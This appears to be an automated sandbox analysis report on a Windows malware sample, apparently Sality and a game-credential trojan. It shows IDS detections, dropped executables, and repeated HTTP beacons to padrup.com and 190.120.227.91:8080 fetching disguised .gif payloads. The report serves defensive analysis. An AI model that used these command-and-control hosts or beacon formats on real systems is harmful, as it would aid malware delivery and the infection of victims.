            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62518 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62526 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62493 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62493 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62512 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62512 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62530 -> 185.53.178.50:80
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: rrco.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: pmcv.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: windtnq.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winmbftrd.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: wingljcv.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: wincshuip.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winwxfjkb.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: windxtl.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winuvylxx.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winftiwuh.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winyasen.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: vdbi.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winybvnr.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winfbuysn.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: nlnup.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | File created: winitfun.exe.0.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File created: winysltfm.exe.35.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File created: winmvfhu.exe.35.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File created: winnqowgt.exe.35.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | File created: wingvdx.exe.35.dr
            Source: unknown | Network traffic detected: IP country count 21
            Source: global traffic | TCP traffic: 192.168.2.7:49725 -> 189.25.42.209:1338
            Source: global traffic | TCP traffic: 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: global traffic | UDP traffic: 192.168.2.7:59786 -> 94.76.206.19:1473
            Source: global traffic | UDP traffic: 192.168.2.7:59787 -> 46.45.148.196:5683
            Source: global traffic | UDP traffic: 192.168.2.7:59788 -> 83.222.184.130:5750
            Source: global traffic | UDP traffic: 192.168.2.7:59789 -> 58.140.114.152:5010
            Source: global traffic | UDP traffic: 192.168.2.7:49975 -> 80.178.242.19:4630
            Source: global traffic | UDP traffic: 192.168.2.7:49976 -> 61.95.152.112:6800
            Source: global traffic | UDP traffic: 192.168.2.7:49977 -> 220.94.117.230:7066
            Source: global traffic | UDP traffic: 192.168.2.7:49978 -> 58.85.93.82:4840
            Source: global traffic | UDP traffic: 192.168.2.7:50037 -> 195.42.129.188:4876
            Source: global traffic | UDP traffic: 192.168.2.7:50038 -> 81.180.90.149:9674
            Source: global traffic | UDP traffic: 192.168.2.7:64958 -> 113.190.137.239:8112
            Source: global traffic | UDP traffic: 192.168.2.7:64959 -> 89.45.97.101:4375
            Source: global traffic | UDP traffic: 192.168.2.7:64960 -> 203.110.84.90:4882
            Source: global traffic | UDP traffic: 192.168.2.7:64961 -> 121.243.130.85:6989
            Source: global traffic | UDP traffic: 192.168.2.7:64962 -> 124.123.112.184:6219
            Source: global traffic | UDP traffic: 192.168.2.7:64963 -> 121.135.15.57:4611
            Source: global traffic | UDP traffic: 192.168.2.7:61625 -> 122.169.249.87:5878
            Source: global traffic | UDP traffic: 192.168.2.7:61626 -> 183.83.119.156:6511
            Source: global traffic | UDP traffic: 192.168.2.7:61627 -> 195.174.68.81:6296
            Source: global traffic | UDP traffic: 192.168.2.7:61628 -> 77.81.225.89:6380
            Source: global traffic | UDP traffic: 192.168.2.7:61629 -> 195.174.143.33:5960
            Source: global traffic | UDP traffic: 192.168.2.7:61630 -> 117.239.49.110:5415
            Source: global traffic | UDP traffic: 192.168.2.7:61631 -> 115.119.58.98:5310
            Source: global traffic | UDP traffic: 192.168.2.7:61632 -> 93.114.177.116:4876
            Source: global traffic | UDP traffic: 192.168.2.7:56335 -> 124.30.139.5:4294
            Source: global traffic | UDP traffic: 192.168.2.7:56336 -> 95.64.101.42:5285
            Source: global traffic | UDP traffic: 192.168.2.7:56337 -> 189.35.177.247:4490
            Source: global traffic | UDP traffic: 192.168.2.7:56338 -> 95.76.49.203:4440
            Source: global traffic | UDP traffic: 192.168.2.7:56339 -> 121.162.97.129:4900
            Source: global traffic | UDP traffic: 192.168.2.7:56340 -> 115.98.98.230:5220
            Source: global traffic | UDP traffic: 192.168.2.7:56341 -> 122.99.102.253:4980
            Source: global traffic | UDP traffic: 192.168.2.7:56342 -> 77.81.224.130:7023
            Source: global traffic | UDP traffic: 192.168.2.7:56343 -> 89.41.154.115:5038
            Source: global traffic | UDP traffic: 192.168.2.7:56344 -> 89.45.96.223:5614
            Source: global traffic | UDP traffic: 192.168.2.7:56345 -> 195.239.22.166:6065
            Source: global traffic | UDP traffic: 192.168.2.7:56346 -> 188.215.26.241:6260
            Source: global traffic | UDP traffic: 192.168.2.7:56347 -> 93.114.228.238:5959
            Source: global traffic | UDP traffic: 192.168.2.7:56348 -> 46.248.223.58:5545
            Source: global traffic | UDP traffic: 192.168.2.7:56349 -> 77.81.228.77:6130
            Source: global traffic | UDP traffic: 192.168.2.7:56350 -> 77.81.228.140:5960
            Source: global traffic | UDP traffic: 192.168.2.7:56351 -> 81.199.91.188:4980
            Source: global traffic | UDP traffic: 192.168.2.7:56352 -> 190.111.22.45:6065
            Source: global traffic | UDP traffic: 192.168.2.7:56353 -> 85.204.112.3:6244
            Source: global traffic | UDP traffic: 192.168.2.7:56354 -> 183.83.90.202:5218
            Source: global traffic | UDP traffic: 192.168.2.7:56355 -> 178.233.92.89:4980
            Source: global traffic | UDP traffic: 192.168.2.7:56356 -> 196.201.129.61:5078
            Source: global traffic | UDP traffic: 192.168.2.7:56357 -> 195.46.33.124:6538
            Source: global traffic | UDP traffic: 192.168.2.7:56358 -> 94.55.239.88:5549
            Source: Joe Sandbox View | IP Address: 185.53.178.50
            Source: Joe Sandbox View | ASN Name: SARAONLINEINFORMATICAEIRELI-MEBR
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49758 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49813 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49790 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49783 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49913 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49824 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49764 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49888 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49851 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49881 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49731 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49845 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62459 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62532 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62535 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62514 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62524 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62516 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62531 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62517 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62525 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62519 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62534 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62487 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62510 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62533 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62513 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62528 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49922 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62521 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49943 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62529 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62527 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62522 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62518 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62526 -> 185.53.178.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62493 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62512 -> 190.120.227.91:8080
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:62530 -> 185.53.178.50:80
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?52dc95=21721684 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?53c2ee=32936340 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?a66df5=87257000 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?c5c499=38882763 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?14117e3=189388539 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?15f8580=23037312 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?1edc267=64718030 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?212b208=34779656 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?2a0a14c=132244452 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?2bf5c9b=276573090 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?3467cb5=274755465 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?36c07fa=459292624 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?3f9f77c=600421212 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?4194e9e=343836950 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?4b65019=711512289 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?4d57b0b=162199062 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?568bd78=635252296 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?588b379=464224605 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?617d87e=1022260460 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?653dba7=849272120 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?6eac3db=348146577 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?70c2488=591181480 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?7a93601=771179526 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?7ca48dd=653487185 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?87df311=569887812 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?9db5459=1322951368 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?f24e375=-2008285411 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?10aef23e=1959305138 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?158b8302=722929156 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?167a9d17=1508537436 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?1bfc4aa7=-538815176 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?1c6e18df=476977375 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?8dc219=65031855 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?90f197=37996124 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?16eca60=240379840 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?1883db2=179941342 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?29e644c=439347960 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?2c177da=138700686 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobaka1.gif?3d9ecca=64613578 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: padrup.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /sobakavolos.gif?3fa5859=600644385 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 190.120.227.91:8080 Cache-Control: no-cache
            Source: unknown TCP traffic detected without corresponding DNS query: 189.25.42.209
            Source: unknown TCP traffic detected without corresponding DNS query: 190.120.227.91
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Code function: 0_2_01290945 lstrcpy,InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_01290945
            Source: SearchApp.exe, 0000000F.00000000.1605212499.000001F4AE90E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: $https://www.google.www.yahoo.cn.bing.www.baidu.www.bing.www.yandex.google chrome equals www.yahoo.com (Yahoo)
            Source: global traffic DNS traffic detected: DNS query: padrup.com
            Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2707649439.0000000002713000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?10aef23e=1959305138
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?10aef23e=19593051388
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?15f8580=23037312
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?167a9d17=15085374369
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?167a9d17=1508537436j
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?167a9d17=1508537436n
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375-&
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375L
            Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375sw
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?212b208=34779656
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?212b208=34779656v
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090~
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?36c07fa=459292624
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?4194e9e=343836950
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062
